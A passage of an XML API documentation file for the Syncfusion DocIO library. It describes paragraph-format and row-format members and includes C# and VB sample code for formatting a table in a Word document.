            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ImportMembers(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the members.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.AcceptChanges">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.RemovePositioning">
            <summary>
            Removes the positioning.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.HasBoolValue(System.Int32)">
            <summary>
            Determines whether the specified property key has boolean value
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.HasValueWithParent(System.Int32)">
            <summary>
            Determines whether the specified property is available. Search includes base formats.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	<c>true</c> if has value; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetPhysicalJustification(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties)">
            <summary>
            Sets the physical justification sprm.
            </summary>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetAlignmentToRender">
            <summary>
            Gets the alignment for document rendering.
            </summary>
            <returns></returns>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.HasShading">
            <summary>
            Determines whether this instance has shading.
            </summary>
            <returns>
            	if this instance has shading, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetSprmOption(System.Int32)">
            <summary>
            Gets the Single Property Modifier Record option value for the specified property.
            <exclude/>
            </summary>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
            <returns>The <b>integer</b> that represents the SPRM value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.PropToFormat(System.Int32)">
            <summary>
            Converts ParagraphProperties property to format property.
            </summary>
            <param name="propKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateLeftIndent">
            <summary>
            Updates the left indent.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateRightIndent">
            <summary>
            Updates the right indent.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateFirstLineIndent">
            <summary>
            Updates the first line indent.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateJustification">
            <summary>
            Updates the justification.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateChangedFormat">
            <summary>
            Updates the changed format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateLineSpacing(System.Int32)">
            <summary>
            Updates the line spacing.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateTabs">
            <summary>
            Updates the tabs.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateShading(System.Int32)">
            <summary>
            Updates the shading.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateBorders">
            <summary>
            Updates the borders.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateBorder(System.Int32,System.Int32,Syncfusion.DocIO.DLS.BorderSide)">
            <summary>
            Updates the border.
            </summary>
            <param name="option">The option.</param>
            <param name="optionNew">The option new.</param>
            <param name="borderSide">The border side.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateLineSpacingSprm(Syncfusion.DocIO.DLS.WParagraphStyle,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord@)">
            <summary>
            Update LineSpacing sprm
            </summary>
            <param name="style"></param>
            <param name="sprm"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateSourceFormat(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Updates the source format.
            </summary>
            <param name="destBaseFormat">The dest base format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateSourceFormatting(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Updates the source formatting.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.CompareListFormat(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Compares the list format.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsValueDefined(System.Int32)">
            <summary>
            Determines whether [is value defined] [the specified key].
            </summary>
            <param name="key">The key.</param>
            <returns>
            	<c>true</c> if [is value defined] [the specified key]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.RemoveValue(System.Int32)">
            <summary>
            Removes the value.
            </summary>
            <param name="key">The key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ClearFormatting">
            <summary>
            Clears the paragraph formatting applied
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetFrameHorizontalDistanceFromText(System.Single)">
            <summary>
            Sets the Frame Horizontal Distance From Text 
            </summary>
            <param name="value">Horizontal distance from text</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetFrameVerticalDistanceFromText(System.Single)">
            <summary>
            Sets the Frame Vertical Distance From Text 
            </summary>
            <param name="value">The vertical distance from text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetFrameY(System.Single)">
            <summary>
            Sets the Frame postion 'Y' value
            </summary>
            <param name="value">The frame y position value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetFrameX(System.Single)">
            <summary>
            Sets the Frame postion 'X' value
            </summary>
            <param name="value">The frame x position value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetFrameWidth(System.Single)">
            <summary>
            Sets the Frame width
            </summary>
            <param name="value">The frame width.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.Compare(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Compares the current paragraph format with another paragraph format
            </summary>
            <param name="paragraphFormat">The paragraph format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.Compare(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
             <summary>
            Compares the current sprms with another sprms
             </summary>
             <param name="sprms">The single property modifier</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.CancelOnChange">
            <summary>
            Gets or sets a value indicating whether [m_cancel on change].
            </summary>
            <value>
              <c>true</c> if [m_cancel on change]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.WordWrap">
            <summary>
            Gets or sets a value indicating whether to break lines on word or character level. By default line breaks on word level.
            </summary>
            <value>
              <c>true</c> if line breaks on word level; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.AbsoluteTab">
            <summary>
            Gets or sets the value that represents the Absolute Tab of paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FirstLineIndentChars">
            <summary>
            Gets or sets the value that represents the paragraph first line indent in character units.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.LeftIndentChars">
            <summary>
            Gets or sets the value that represents the paragraph left indent in character units.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.RightIndentChars">
            <summary>
            Gets or sets the value that represents the paragraph right indent in character units.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.Bidi">
            <summary>
            Gets or sets a value indicating whether the paragraph is right-to-left.
            </summary>
            <value><b>True</b> if the paragraph is right to left; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.Tabs">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.TabCollection"/> that represents the tabs for the specified paragraph. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.Keep">
            <summary>
            Gets or sets a value indicating whether all lines in the paragraph are to remain on the same page. 
            </summary>
            <value><b>True</b> if all lines of the paragraph to remain on the same page; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.KeepFollow">
            <summary>
            Gets or sets a value indicating whether the paragraph remains on the same page as the paragraph that follows it.
            </summary>
            <value><b>True</b> if the current paragraph to remain on the same page as the paragraph that follows it; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.PageBreakBefore">
            <summary>
            Gets or sets a value indicating whether there is a page break before the paragraph.
            </summary>
            <value><b>True </b>if a page break is forced before the paragraph; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.PageBreakAfter">
            <summary>
            Gets or sets a value indicating whether there is page break after the paragraph.
            </summary>
            <value><b>True </b>if a page break is forced after the paragraph; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.WidowControl">
            <summary>
            Gets or sets a value indicating whether the first and last lines of the paragraph are to remain on the 
            same page as the rest of the paragraph when Word repaginates the document. 
            </summary>
            <value><b>True</b> if the first and last lines of the paragraph are to remain on the same page; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.AutoSpaceDN">
            <summary>
            True, if space is automatically inserted between East Asian text and numbers. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.AutoSpaceDE">
            <summary>
            True, if space is automatically inserted between East Asian text and Latin text. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.AdjustRightIndent">
            <summary>
            True, if the paragraph is set to automatically adjust the right indent
            when a document grid for East Asian characters is defined. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.HorizontalAlignment">
            <summary>
            Gets or sets the horizontal alignment for the paragraph. 
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalAlignment"/> member that specifies the type of alignment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.LogicalJustification">
            <summary>
            Gets or sets horizontal alignment for the paragraph as in the input file, while opening files that support logical justification (Docx).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.LeftIndent">
            <summary>
            Gets or sets a <b>float</b> that represents the left indent(in points) for paragraph. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.LeftIndentBi">
            <summary>
            Gets or sets the value that represents the left indent bi for paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.RightIndent">
            <summary>
            Gets or sets the <b>float</b> that represents the right indent for paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.RightIndentBi">
            <summary>
            Gets or sets the value that represents the right indent bi for paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FirstLineIndent">
            <summary>
            Gets or sets a <b>float</b> that represents the first line or hanging indent of the paragraph.
            </summary>
            <value>The positive value is set to first line indent and negative value is set to hanging indent.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FirstLineIndentBi">
            <summary>
            Gets or sets first paragraph line indent bi
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.BeforeSpacing">
            <summary>
            Gets or sets the spacing (in points) before the paragraph. 
            </summary>
            <value>The <b>float </b>that specifies the spacing value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.BeforeLines">
            <summary>
            Gets or sets the before lines  
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.AfterLines">
            <summary>
            Gets or sets the after lines  
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.AfterSpacing">
            <summary>
            Gets or sets the spacing (in points) after the paragraph.
            </summary>
            <value>The <b>float </b>that specifies the spacing value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.Borders">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Borders"/> collection that represents all the borders for the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.BackColor">
            <summary>
            Gets or sets the background color of the paragraph.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> for background.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.ColumnBreakAfter">
            <summary>
            Gets or sets a value indicating whether there is column break after the paragraph.
            </summary>
            <value><b>True</b> if the column break is forced after the paragraph; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.Sprms">
            <summary>
            Gets or sets the SPRMS.
            </summary>
            <value>The SPRMS.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.LineSpacing">
            <summary>
            Gets or sets the line spacing(in points) for the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.LineSpacingRule">
            <summary>
            Gets or sets line spacing rule of the paragraph.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.LineSpacingRule"/> member that specifies the line spacing rule.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.ForeColor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.TextureStyle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.ParaProps">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.SpaceBeforeAuto">
            <summary>
            Gets or sets a value indicating whether Word automatically sets the amount of spacing before the paragraph.
            </summary>
            <value><b>True</b> if spacing before is automatic; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.SpaceAfterAuto">
            <summary>
            Gets or sets a value indicating whether Word automatically sets the amount of spacing after the paragraph.
            </summary>
            <value><b>True</b> if spacing after is automatic; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.OutlineLevel">
            <summary>
            Gets or sets the outline level for the paragraph.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.OutlineLevel"/> member that specifies the outline level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.IsFrame">
            <summary>
            Gets or sets a value indicating whether this instance is frame.
            </summary>
            <value> if this instance is frame, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameVerticalPos">
            <summary>
            Gets or sets the frame vertical pos.
            </summary>
            <value>The frame vertical pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameHorizontalPos">
            <summary>
            Gets or sets the frame horizontal pos.
            </summary>
            <value>The frame horizontal pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameX">
            <summary>
            Gets or sets the frame X.
            </summary>
            <value>The frame X.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameY">
            <summary>
            Gets or sets the frame Y.
            </summary>
            <value>The frame Y.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameWidth">
            <summary>
            Gets or sets the frame width
            </summary>
            <value>The frame Width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameHeight">
            <summary>
            Gets or sets the frame Height
            </summary>
            <value>The frame Height.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameHorizontalDistanceFromText">
            <summary>
            Gets or sets the frame horizontal distance from text.
            </summary>
            <value>The frame horizontal distance from text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.FrameVerticalDistanceFromText">
            <summary>
            Gets or sets the frame vertical distance from text.
            </summary>
            <value>The frame vertical distance from text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.WrapFrameAround">
            <summary>
            Gets or sets a value indicating whether to wrap frame around.
            </summary>
            <value>The frame wrap mode</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.HasListReference">
            <summary>
            Gets a value indicating whether this instance has reference on list.
            </summary>
            <value>
            	 if this instance has list reference, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.IsChangedFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.ContextualSpacing">
            <summary>
            Gets or sets a value indicating whether to add space between the paragraphs of same style.
            </summary>
            <value><b>True </b>if not to have spacing; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.TableStyleParagraphFormat">
            <summary>
            Gets or sets the table style paragraph format.
            </summary>
            <value>The table style paragraph format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.MirrorIndents">
            <summary>
            Gets or sets a value indicating whether the left and right indents are of same width. 
            </summary>
            <value><b>True</b> if to have mirror indents; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.SuppressAutoHyphens">
            <summary>
            Gets or sets a value that indicates whether automatic hyphenation of words is enabled or disabled. 
            </summary>
            <value><b>True</b> if automatic hyphenation of words is enabled; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphFormat.XmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RowFormat">
            <summary>
            Represents the formatting properties for the table and row in a Word document. 
            </summary>
            <example>The following example illustrates how to apply table formatting options such as Borders, LeftIndent, Paddings, IsAutoResize, etc.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Open an existing Word document into DocIO instance
                document.Open("Table.docx", FormatType.Docx);
                //Access the instance of the first section in the Word document
                WSection section = document.Sections[0];
                //Access the instance of the first table in the section
                WTable table = section.Tables[0] as WTable;
                //Specify the title for the table
                table.Title ="PriceDetails";
                //Specify the description of the table
                table.Description = "This table shows the price details of various fruits";
                //Specify the left indent of the table
                table.IndentFromLeft = 50;
                //Specify the background color of the table
                table.TableFormat.BackColor = Color.FromArgb(192, 192, 192);
                //Specify the horizontal alignment of the table
                table.TableFormat.HorizontalAlignment = RowAlignment.Left;
                //Specify the left, right, top and bottom padding of all the cells in the table
                table.TableFormat.Paddings.All = 10;
                //Specify the auto resize of table to automatically resize all cell width based on its content
                table.TableFormat.IsAutoResized = true;
                //Specify the table top, bottom, left and right border line width
                table.TableFormat.Borders.LineWidth = 2f;
                //Specify the table horizontal border line width
                table.TableFormat.Borders.Horizontal.LineWidth = 2f;
                //Specify the table vertical border line width
                table.TableFormat.Borders.Vertical.LineWidth = 2f;
                //Specify the tables top, bottom, left and right border color
                table.TableFormat.Borders.Color = Color.Red;
                //Specify the table Horizontal border color
                table.TableFormat.Borders.Horizontal.Color = Color.Red;
                //Specify the table vertical border color
                table.TableFormat.Borders.Vertical.Color = Color.Red;
                //Specify the table borders border type
                table.TableFormat.Borders.BorderType = BorderStyle.Double;
                //Access the instance of the first row in the table
                WTableRow row = table.Rows[0];
                //Specify the row height
                row.Height = 20;
                //Specify the row height type
                row.HeightType = TableRowHeightType.AtLeast;
                document.Save("TableFormatting.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Open an existing Word document into DocIO instance
                document.Open("Table.docx", FormatType.Docx)
                'Access the instance of the first section in the Word document
                Dim section As WSection = document.Sections(0)
                'Access the instance of the first table in the section
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Specify the title for the table
                table.Title = "PriceDetails"
                'Specify the description of the table
                table.Description = "This table shows the price details of various fruits"
                'Specify the left indent of the table
                table.IndentFromLeft = 50
                'Specify the background color of the table
                table.TableFormat.BackColor = Color.FromArgb(192, 192, 192)
                'Specify the horizontal alignment of the table
                table.TableFormat.HorizontalAlignment = RowAlignment.Left
                'Specify the left, right, top and bottom padding of all the cells in the table
                table.TableFormat.Paddings.All = 10
                'Specify the auto resize of table to automatically resize all cell width based on its content
                table.TableFormat.IsAutoResized = True
                'Specify the table top, bottom, left and right border line width
                table.TableFormat.Borders.LineWidth = 2.0F
                'Specify the table horizontal border line width
                table.TableFormat.Borders.Horizontal.LineWidth = 2.0F
                'Specify the table vertical border line width
                table.TableFormat.Borders.Vertical.LineWidth = 2.0F
                'Specify the tables top, bottom, left and right border color
                table.TableFormat.Borders.Color = Color.Red
                'Specify the table Horizontal border color
                table.TableFormat.Borders.Horizontal.Color = Color.Red
                'Specify the table vertical border color
                table.TableFormat.Borders.Vertical.Color = Color.Red
                'Specify the table borders border type
                table.TableFormat.Borders.BorderType = BorderStyle.[Double]
                'Access the instance of the first row in the table
                Dim row As WTableRow = table.Rows(0)
                'Specify the row height
                row.Height = 20
                'Specify the row height type
                row.HeightType = TableRowHeightType.AtLeast
                document.Save("TableFormatting.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RowFormat.m_tableRowDesc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RowFormat.m_xmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.RowFormat"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.RowFormat"/> class with 
            the specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetGridCount(System.Int32)">
            <summary>
            Gets the grid count.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetOffsetIndex(System.Collections.Generic.List{System.Single},System.Single)">
            <summary>
            Gets the index of the offset.
            </summary>
            <param name="tableGrid">The table grid.</param>
            <param name="offset">The offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetCellOffset(System.Int32)">
            <summary>
            Gets the cell offset.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetTextWrapAround">
            <summary>
            Gets the text wrap around.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.SetTextWrapAround(System.Boolean)">
            <summary>
            Sets the text wrap around.
            </summary>
            <param name="value">if set to <c>true</c> [value].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ClearAbsolutePosition">
            <summary>
            Clears the absolute position.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.CheckRowDesc">
            <summary>
            Checks the row descriptor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdateRowFormat(System.Int32)">
            <summary>
            Updates the row format.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdateRowDescriptor(System.Int32)">
            <summary>
            Updates the row descriptor.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.HasSprms">
            <summary>
            Determines whether this instance has SPRMS.
            </summary>
            <returns>
            	if this instance has SPRMS, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetRowIndent">
            <summary>
            Gets table indent.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetSprmOption(System.Int32)">
            <summary>
            Returns the Single Property Modifier Record option value for the specified property.
            <exclude/>
            </summary>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
            <returns>The <b>integer</b> that represents the SPRM value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.CheckChangedFormat">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.SetChangeFormat">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.AcceptChanges">
            <summary>
            Removes the changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdateRowBeforeAfterWidth(System.Int16,System.Boolean)">
            <summary>
            Updates the row grid before/after width.
            </summary>
            <param name="row">The row.</param>
            <param name="gridSpan">The grid span.</param>
            <param name="isAfterWidth">if set to <c>true</c> [is after width].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetDefComposite(System.Int32)">
            <summary>
            Returns the composite values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
